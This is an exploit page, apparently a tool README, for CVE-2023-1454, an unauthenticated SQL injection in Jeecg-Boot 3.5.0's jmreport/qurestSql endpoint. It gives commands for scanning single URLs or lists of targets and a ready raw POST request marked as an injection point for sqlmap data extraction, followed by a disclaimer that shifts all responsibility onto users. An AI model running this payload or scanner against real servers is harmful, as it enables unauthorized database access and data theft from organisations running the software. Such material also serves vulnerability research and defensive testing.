## https://sploitus.com/exploit?id=6C00F3F6-BB0A-579C-A85E-A127DA0C222D
# CVE-2023-1454
`jmreport/qurestSql` โ Unauthorized SQL injection for batch scanning
Jeecg-Boot is a rapid development platform based on Spring Boot and Jeecg-Boot-Plus. In the latest version of jeecg-boot 3.5.0, several SQL injection vulnerabilities were discovered.
[Original tool URL](https://github.com/MzzdToT/CVE-2023-1454/)
The original tool had a high false-positive rate. I modified the judgment conditions and optimized the code accordingly.
## Tool usage
- `python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111`: Test individual URLs.
- `python3 CVE-2023-1454-scan.py -f url.txt`: Perform batch detection.
After scanning, a file `vuln.txt` will be generated in the current directory, listing URLs with vulnerabilities.
**POC**:
**Example**: Save the data as a txt file using sqlmap to obtain the data:
```
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129
{"apiSelectId":"1290104038414721025","id":"1*"}
## Disclaimer
Any direct or indirect consequences or losses caused by spreading or utilizing the information provided in this article are the responsibility of the users themselves. The author assumes no responsibility for such incidents.
[source-iocs-preserved url=http://127.0.0.1:1111]